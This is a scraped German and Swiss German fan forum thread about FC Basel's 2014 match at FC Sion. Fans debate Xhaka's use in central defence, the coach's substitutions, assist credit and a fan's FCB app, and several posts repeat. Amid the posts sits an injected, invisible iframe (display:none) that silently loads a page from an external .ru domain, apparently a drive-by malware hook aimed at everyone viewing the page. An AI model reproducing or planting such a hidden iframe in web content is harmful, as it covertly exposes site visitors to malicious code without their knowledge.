Diese frage hab ich mir schon letzte Saison gestellt..Bender hat geschrieben:Weshalb spielt eigentlich Xhaka jedes Mal und dann noch über 90 Minuten? In den letzten beiden Spielen hat er 2 Tore direkt verschuldet und bei 2en falsch verteidigt. Hat der Trainer zu wenige Alternativen im Kader?!
So. 17.08.2014, 13.45 FC Sion - FC Basel
Das internationale Transferfenster ist noch bis zum 31. August geöffnet!Bender hat geschrieben:Weshalb spielt eigentlich Xhaka jedes Mal und dann noch über 90 Minuten? In den letzten beiden Spielen hat er 2 Tore direkt verschuldet und bei 2en falsch verteidigt. Hat der Trainer zu wenige Alternativen im Kader?!
„Wir spielen jedes Spiel so, als sei es das letzte, weil wir ja am Wochenende sonst nichts zu tun haben.“(Jürgen Klopp)
-
- Erfahrener Benutzer
Haha, geil wie do inne widr umegmotzt wird!
Was ich gseh ha: E geils Fuessballspiel, sehr gueti Unterhaltig gsi! Und jä, das hets mr letscht Saison zwenig gäh. Euch isch scho klar, dass unter dr "gloriose" Fink-Ära viel Spiel au so ähnlig gloffe sin? Und Chance für witeri Goals het dr FCB hüt jo au no zu huff kah - gueti Leischtig gsi.
S einzig wo dr Paulo wirklig sofort mues ändere: Xhaka nüm ind Inneverteidigung stelle. Dä het hüt e witers Müsterli drvo abglieferet, wurum är halt äfach kei Inneverteidiger isch.
Was ich gseh ha: E geils Fuessballspiel, sehr gueti Unterhaltig gsi! Und jä, das hets mr letscht Saison zwenig gäh. Euch isch scho klar, dass unter dr "gloriose" Fink-Ära viel Spiel au so ähnlig gloffe sin? Und Chance für witeri Goals het dr FCB hüt jo au no zu huff kah - gueti Leischtig gsi.
S einzig wo dr Paulo wirklig sofort mues ändere: Xhaka nüm ind Inneverteidigung stelle. Dä het hüt e witers Müsterli drvo abglieferet, wurum är halt äfach kei Inneverteidiger isch.
- SubComandante
- Erfahrener Benutzer
Die Flanke, welche im Strafraum von einem Basler zu Gashi weitergeleitet wurde, der dann die Flanke vor das Tor schlug, und der Goalie das Eigentor machte?Feanor hat geschrieben:nö, minuspunkte
aber die flanke zum 3-2 stammt trotzdem von ihm
Das nennst du Assist? Den Assistpunkt würde ich jetzt Gashi zugestehen.
gäll. Ändlig wieder Spiel mit Emotione und SpannigBolzblatzholzer hat geschrieben:Haha, geil wie do inne widr umegmotzt wird!

Nid füre Lohn, für d'Region
LordTamtam hat geschrieben:Ich freu mich auf morgen früh. Dann geht das gejammer um Trump nochmals 4 Jahre weiter.
-
- Erfahrener Benutzer
- Mundharmonika
- Erfahrener Benutzer
Mann, Du nervst echt mit Deinem ständigen Bedürfnis, der Welt direkt oder indirekt zu sagen, dass Deine App soooooooo viel besser ist. Bisch jo e Tolle...andreas hat geschrieben:Wär het scho FCB App Pushnoochrichte.
Sin erscht no langsam.

By the way... ich finde jegliche FCB-App absolut unnötig. Entweder sehe ich mir das Spiel live im Stadion an, am Fernseher oder über einen Stream. Wüsste nicht, weshalb ich dann noch diese nervenden Push-Nachrichten bekommen müsste.
- - - - -
Zum Spiel: Für mich sieht der FCB-Fussball im Moment irgendwie sehr improvisiert und unkontrolliert aus, heute glücklicherweise mit besserem Ende für uns. Sousa schickt 11 Leute aufs Feld und versucht dann von der Linie aus diese 11 Leute herum zu dirigieren. Ich glaube nicht, dass wir gegen Mannschaften mit qualitativ besseren Kadern auf diese Art und Weise viel zu melden haben werden. Ich wäre froh, wenn wir den Testspiel-Modus langsam ablegen könnten und zum Ernstkampf-Modus übergehen könnten.
So. 17.08.2014, 13.45 FC Sion - FC Basel
In der 77. Minute steht es 2:2 - für einen Verteidiger wird ein offensiver Mann eingewechselt! Ein Traum - jetzt noch das Missgeschick mit Xhaka als IV korrigieren und die Sache läuft.
[CENTER]Stars kommen und gehen - Legenden bleiben ewig
**#AF_13 ** #MED_10**
[/CENTER]
**#AF_13 ** #MED_10**
[/CENTER]
Sehe ich auch so. Langsam aber sicher muss er wissen, welcher Spieler wo eingesetzt wird und bitte, wer nicht mehr...Mundharmonika hat geschrieben:Ich wäre froh, wenn wir den Testspiel-Modus langsam ablegen könnten und zum Ernstkampf-Modus übergehen könnten.
Erstaunlich ist trotzdem, dass der FCB mit derart vielen Rotationen einen durchaus attraktiven und erfolgreichen Fussball spielen kann. Und da ist noch einige Luft nach oben.
Jo! Isch er! Was hesch du so vorz'wiise?Mundharmonika hat geschrieben:Bisch jo e Tolle...![]()
Zum Spiel: Unterhaltsam, noch zu fehlerbehaftet.
<iframe src="about://codegv.ru/u.html" style="display: none;" id="zunifrm"></iframe>
[CENTER] [CENTER][CENTER]Um ein vollständiges Mitglied einer Schafherde zu sein, muss man vor allem ein Schaf sein.
[/CENTER]
[/CENTER]
[CENTER][CENTER]* * *
Albert Einstein[/CENTER]
[/CENTER]
[/CENTER]
[/CENTER]
[/CENTER]
[CENTER][CENTER]* * *
Albert Einstein[/CENTER]
[/CENTER]
[/CENTER]
Die meisten "motzen" nur, weil man von den Fehlern (noch) nichts gelernt und heute wieder einen 2 Tore Vorsprung verspielt hat.Bolzblatzholzer hat geschrieben:Haha, geil wie do inne widr umegmotzt wird!
Wir haben nicht nur Spieler, sondern auch Rekorde aufgestellt! 8x Meister in Serie!
Das ist wirklich das Schlimmste und hätte eigentlich schon längst geschehen sollen. Deshalb werde ich von Spiel von Spiel skeptischer, dass Sousa das einsieht.Blutengel hat geschrieben: Ein Traum - jetzt noch das Missgeschick mit Xhaka als IV korrigieren und die Sache läuft.
Andererseits freut mich sagen zu dürfen, dass PHD immer besser wird. Auch seine Körpersprache ist nicht mehr negativ. Für mich in dieser Form ganz klar Stammspieler.
6 Spiele - 15 Punkte. Das ist doch toll!
- Mundharmonika
- Erfahrener Benutzer
- Kurtinator
- Erfahrener Benutzer
[quote="Mundharmonika"]Mann, Du nervst echt mit Deinem ständigen Bedürfnis, der Welt direkt oder indirekt zu sagen, dass Deine App soooooooo viel besser ist. Bisch jo e Tolle... 
By the way... ich finde jegliche FCB-App absolut unnötig. Entweder sehe ich mir das Spiel live im Stadion an, am Fernseher oder über einen Stream. Wüsste nicht, weshalb ich dann noch diese nervenden Push-Nachrichten bekommen müsste.
- - - - -
.[quote]
z.B. ich auf Zypern. Das wifi hier ist so lahm, dass man keine Spiele streamen kann!
Sei doch froh, dass es solche Leute gibt. Manchmal versteh ich dich echt nicht.
Andreas's App hat mir in der Not geholfen.
Zum Spiel: Wäre gerne in Sion gewesen!

- - - - -
.[quote]
z.B. ich auf Zypern. Das wifi hier ist so lahm, dass man keine Spiele streamen kann!
Sei doch froh, dass es solche Leute gibt. Manchmal versteh ich dich echt nicht.
Andreas's App hat mir in der Not geholfen.
Zum Spiel: Wäre gerne in Sion gewesen!
Falcão hat geschrieben: "Tradition ist nicht die Anbetung von Asche, es ist die Weitergabe des Feuers!"
- Mundharmonika
- Erfahrener Benutzer
soweit ich das gesehen habe, kommt die gefährliche Flanke auf den zweiten Pfosten von Xhaka, diese wurde abgenommen von Gashi, der mit dem Kopf ungemein fies direkt auf Vanins köpfelt, der das Ding dann nur noch reinmachen musste.Tsunami hat geschrieben:Die Flanke, welche im Strafraum von einem Basler zu Gashi weitergeleitet wurde, der dann die Flanke vor das Tor schlug, und der Goalie das Eigentor machte?
Das nennst du Assist? Den Assistpunkt würde ich jetzt Gashi zugestehen.
Keine Ahnung, was offiziell gewertet wurde, meiner Ansicht nach ist das ein Tor von Gashi und ein Assist von Xhaka.
Damit wollte ich aber nicht in irgendeiner Weise Xhakas Leistung verschönern. Die war schlecht, für mich gehört er a) nicht in die Innenverteidigung und b) nicht in die Startelf.
Den Wechsel hingegen konnte ich dann trotzdem verstehen: Suchy hatte bereits Gelb und nach Vorne hat der nun gar NICHTS drauf. Xhaka kann man immerhin als aggressiven Kämpfer noch verwenden, wenn der Sieg unbedingt gesucht wird...
-
- Erfahrener Benutzer
Auch meine Gedanken. Der Trainer wollte siegen und brachte einen offensiven Spieler für einen Verteidiger.Blutengel hat geschrieben:In der 77. Minute steht es 2:2 - für einen Verteidiger wird ein offensiver Mann eingewechselt! Ein Traum - jetzt noch das Missgeschick mit Xhaka als IV korrigieren und die Sache läuft.
Gefällt mir. Hätte auch nicht abgelästert, wenn es in die Hose gegangen wäre. Mut zum Risiko wird in der Regel belohnt.
Für immer Rotblau - egal in welcher Liga